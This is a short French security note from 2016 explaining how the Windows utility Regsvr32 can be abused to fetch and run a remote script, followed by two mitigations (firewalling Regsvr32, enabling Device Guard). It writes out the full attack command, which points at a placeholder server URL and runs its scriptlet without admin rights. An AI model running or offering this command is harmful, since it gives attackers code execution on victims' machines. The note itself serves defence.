28 Avril 2016
Regsvr32 est un utilitaire en ligne de commande qui permet d'inscrire ou de désinscrire dans le registre Windows des DLL ou des contrôles activeX il gére aussi les proxys,les redirections et l' HTTPS
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
La commande permet à Regsvr32 d'accepter une URL pointant vers un script sans besoin d'avoir des privilèges administrateurs et sans toucher au registre il suffit pour un pirate d'héberger son script sur un domaine qu'il contrôle pour avoir accès a la machine
Solution pour bloquer Regsvr32
-Bloquer l'accès au réseau pour Regsvr32 avec un pare-feu.
-Activer Device Guard (Applicable seulement sur windows 10 enterprise avec hyper-V